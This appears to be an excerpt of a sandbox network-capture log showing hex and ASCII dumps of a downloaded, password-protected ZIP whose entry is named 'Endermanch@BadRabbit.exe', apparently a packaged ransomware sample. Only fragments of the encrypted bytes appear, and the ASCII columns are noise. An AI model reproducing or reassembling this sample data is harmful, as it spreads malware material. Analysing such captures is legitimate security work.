                                                                                                                                                            2022-09-29 12:47:40 UTC38694INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                            Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                            2022-09-29 12:47:40 UTC38696INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                                                                            Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                                                                            2022-09-29 12:47:40 UTC38697INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                                                                            Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                                                                            2022-09-29 12:47:40 UTC38698INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                                                                            Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                                                                            2022-09-29 12:47:40 UTC38700INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                                                                            Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                                                                            2022-09-29 12:47:40 UTC38701INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                                                                            Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
                                                                                                                                                            2022-09-29 12:47:40 UTC38702INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                                                                            Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                                                                            2022-09-29 12:47:40 UTC38704INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                                                                            Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                                                                            2022-09-29 12:47:40 UTC38705INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                                                                            Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
                                                                                                                                                            2022-09-29 12:47:40 UTC38706INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                                                                            Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                                                                            2022-09-29 12:47:40 UTC38708INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                                                                            Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                                                                            2022-09-29 12:47:40 UTC38709INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                                                                            Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                                                                            2022-09-29 12:47:40 UTC38709INData Raw: 08 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8 a2
                                                                                                                                                            Data Ascii: W;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                                                                            2022-09-29 12:47:40 UTC38725INData Raw: a2 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22 50
                                                                                                                                                            Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"P
                                                                                                                                                            2022-09-29 12:47:40 UTC38741INData Raw: 17 3f c2 33 9c a4 f5 61 71 9b f0 a3 66 76 29 03 59 ec d7 60 47 f5 f9 d9 76 2e a8 01 fe 24 41 ca 6c 0b 96 45 47 df 38 80 47 2b 0b c9 ee 59 1b 47 8f c9 0a fa 46 e5 c2 31 ca b5 01 a7 27 0f 3a 46 79 d6 9f d9 9a 85 3a 3f 84 08 cf b5 bd 35 c3 13 1a 98 00 d0 8e e1 71 43 9b f7 59 8d f4 57 27 79 27 9b d0 1b 46 f8 a7 8d cc 97 1e ac 36 89 10 3f c4 6a 1f a6 82 8e c2 18 ea 2f 30 df b9 73 03 06 e8 76 74 54 a1 c2 56 58 fb ca 02 70 1b a4 8a 9b fc 4e 81 cb 7f e4 49 55 d7 ca 43 b1 78 63 b5 d0 42 d4 4c 1c 76 aa d5 b7 db 50 7b b7 98 45 7c ee f4 e8 53 6e 2a f9 c3 13 dc 2d d6 aa f8 f0 51 b5 53 73 e5 8e 7c 56 64 69 a9 cf 96 ed 4c bb f8 e5 0e f1 a3 a0 c9 60 31 fb 15 ee d6 80 6f d6 54 20 12 63 df 17 14 5f 7c 46 c9 6e 48 f3 5a 90 38 39 ac 45 52 a9 67 b8 43 a2 78 96 b6 5c bc 63 0e
                                                                                                                                                            Data Ascii: ?3aqfv)Y`Gv.$AlEG8G+YGF1':Fy:?5qCYW'y'F6?j/0svtTVXpNIUCxcBLvP{E|Sn*-QSs|VdiL`1oT c_|FnHZ89ERgCx\c
                                                                                                                                                            2022-09-29 12:47:40 UTC38757INData Raw: 85 fc a4 ac f1 3c 8d 2d 70 20 41 b3 3a d5 bb 30 04 e0 cc 85 c1 6a ae bf 8a 7b a3 28 e7 ea ed dc c8 24 ee 73 45 42 d9 47 37 27 fb 49 cc fe 97 38 f4 33 fe a5 73 7c e8 9e c2 b5 73 95 30 85 18 39 dc f1 02 08 7d eb 76 75 95 35 c9 53 f0 3a 88 b3 63 f7 52 cc 3a d8 02 39 c6 e3 fb ce 21 c5 53 ff ae 48 48 bf 9e 8b bf 96 63 07 ad 8c 90 fd 6c 4f e6 06 7e 27 75 26 96 81 ec d9 08 30 e9 e1 b7 cd 43 c7 c6 e1 63 c1 01 46 6f 75 8b 82 43 1f b2 6d 6e ad 0f 72 0f f5 84 63 7b 29 1d bb a5 7f 9b 31 bd 78 fa 88 66 5a ca 2f 5f fb 3b 79 0c b3 21 2b d2 4f ef 53 52 79 27 58 ab e6 8d de 84 0b c2 40 19 04 20 83 87 d5 bb 39 56 6b 89 f0 9d 4a 1e 36 f9 8b 4c 09 b2 b4 b1 b7 11 c8 09 8c fb 1c fe 29 91 52 83 d4 61 0b 52 54 02 ff ed 1f 95 1d 2f 99 fb 30 24 45 1d fd 1b 79 f1 41 71 c5 25 7a d0
                                                                                                                                                            Data Ascii: <-p A:0j{($sEBG7'I83s|s09}vu5S:cR:9!SHHclO~'u&0CcFouCmnrc{)1xfZ/_;y!+OSRy'X@ 9VkJ6L)RaRT/0$EyAq%z
                                                                                                                                                            2022-09-29 12:47:40 UTC38773INData Raw: d4 dd 86 ef c3 bb 7d 78 d9 5b 4c 9c 7d 61 b2 37 54 46 58 b0 97 76 c9 40 b0 12 3d 20 00 6f 79 8b 0b 1e 88 33 2e e8 bd 78 20 6e 66 3d c7 ce 6d d0 2d c7 cf 8e 65 4c 97 9e 11 4e b5 b1 07 43 87 17 32 55 20 6c 8e fb 51 6e 4d bd 97 15 88 bb 92 ad 04 12 32 c4 97 57 2e 78 38 ad 56 23 9b 65 3f a5 8b 25 1c 6e 7e fb ad 0f e6 85 b3 d1 00 3a ba 84 fa c7 0c 74 8a 15 1c 7b e0 a2 96 03 7f 4d fb cf 2e 22 77 e1 72 42 d6 72 e6 21 71 20 0e 02 7c 90 82 45 dd 92 2b 36 7b 88 e7 ca 2d 70 04 ae 15 2e 68 ee 7a a5 21 d8 a2 68 42 6d aa 6c 70 24 46 ea 46 e9 65 78 91 f8 33 bc 17 b7 9a 0f 55 1e 1e aa be d3 03 cd 9b 2a 70 eb 84 e3 f3 1b 81 d6 55 45 6a 86 31 a4 c6 49 a8 7c 61 89 3c 7e f3 f2 fa aa ed b4 13 07 36 ba 60 2b 1b 4d 59 1a 13 db 55 e9 43 e9 3a eb 68 c3 c5 5a cd 7d 3b 4f 8c 6f 97
                                                                                                                                                            Data Ascii: }x[L}a7TFXv@= oy3.x nf=m-eLNC2U lQnM2W.x8V#e?%n~:t{M."wrBr!q |E+6{-p.hz!hBmlp$FFex3U*pUEj1I|a<~6`+MYUC:hZ};Oo
                                                                                                                                                            2022-09-29 12:47:40 UTC38789INData Raw: 94 39 71 d2 b5 83 5d ce ab 21 74 60 76 2e b4 f7 9f 48 be 4f f9 3e 0e cf 32 69 3e bf 9d 74 9f 80 e4 9e 62 48 6f b9 c1 a3 58 e4 a0 4a 9d df b4 3d 19 c6 94 07 87 9b 52 64 1b 28 ca e6 29 93 3b dc dd 03 bd 6b 79 97 5c cf 13 c3 30 d5 89 b5 c7 e4 3f 30 4e 2c f4 e5 8b 3a b5 b1 f3 be 30 cd aa f7 ee e1 00 83 94 9a 9d dc 27 77 dd b4 8e f6 45 52 d0 30 6e 46 49 f3 65 78 f5 fa c8 30 99 68 0b 11 97 4f 0b cb 2c fd 9a a2 ef 77 0d 2a c7 a4 77 27 07 7d 6d 11 f8 67 35 3f 19 78 c0 ba b9 0c dc c8 81 dc 76 b9 64 c5 e6 11 ec dd 7b 01 4b d7 b4 19 bc 94 26 cc 9f 1e 8b c4 f7 29 4b 33 3b 0b 41 b0 2d 92 b3 15 21 01 16 4b 29 c3 42 1c 37 b6 d6 c5 fe f8 3d d2 57 02 95 94 a5 57 0a d3 2d 2a 7f aa 2a 9a 0d 77 38 1f d9 08 08 13 8f 03 d2 eb f4 23 75 c6 72 2f 31 49 cb 39 e8 4d ff b2 00 73 8c
                                                                                                                                                            Data Ascii: 9q]!t`v.HO>2i>tbHoXJ=Rd();ky\0?0N,:0'wER0nFIex0hO,w*w'}mg5?xvd{K&)K3;A-!K)B7=WW-**w8#ur/1I9Ms
                                                                                                                                                            2022-09-29 12:47:40 UTC38805INData Raw: 96 2c 12 33 d7 9a f8 a7 1b 9d 39 64 7a 4f 6e cb 87 6a 91 c3 96 30 d3 87 c4 33 8a 0a 99 7d 7c 85 23 07 d2 ba 25 69 28 02 1f 15 3f a0 4e 0a 33 96 0f d3 3d 71 66 fe bc 48 08 b7 2f a2 85 a2 7b aa 49 ba fb 97 95 f5 9e 17 c7 8d e6 46 58 8e fb 64 7b d2 86 9e 1a 97 4a a9 dc 27 ff d6 d6 ad e3 f6 30 6e b1 73 0c a8 08 00 f5 d0 88 db 5b ba 3a 5d c9 0e 06 bd 71 8d fd 7a 64 b0 3d e4 d8 c3 83 c5 44 ce 1c d8 e0 29 18 bd a2 80 9d ee 59 f6 1b b9 a9 bd 15 19 9a a0 99 8f cf c6 92 c7 fd 18 3e 08 c6 82 89 46 2b 28 20 86 41 7e 0c 58 3f 99 79 4c 3a 6b 95 b2 db f0 55 26 f5 57 a4 41 82 a0 2e eb bf 61 68 7b f7 84 45 91 e1 fb 07 c1 37 28 67 fa bf d4 db 49 24 9b 19 3f ab ab 16 02 a6 6e 98 e6 a5 c6 c4 31 03 4c b0 08 81 57 b8 31 51 5e 38 91 b5 6f aa 09 21 65 48 98 bf ec 04 17 3d 4c 92
                                                                                                                                                            Data Ascii: ,39dzOnj03}|#%i(?N3=qfH/{IFXd{J'0ns[:]qzd=D)Y>F+( A~X?yL:kU&WA.ah{E7(gI$?n1LW1Q^8o!eH=L
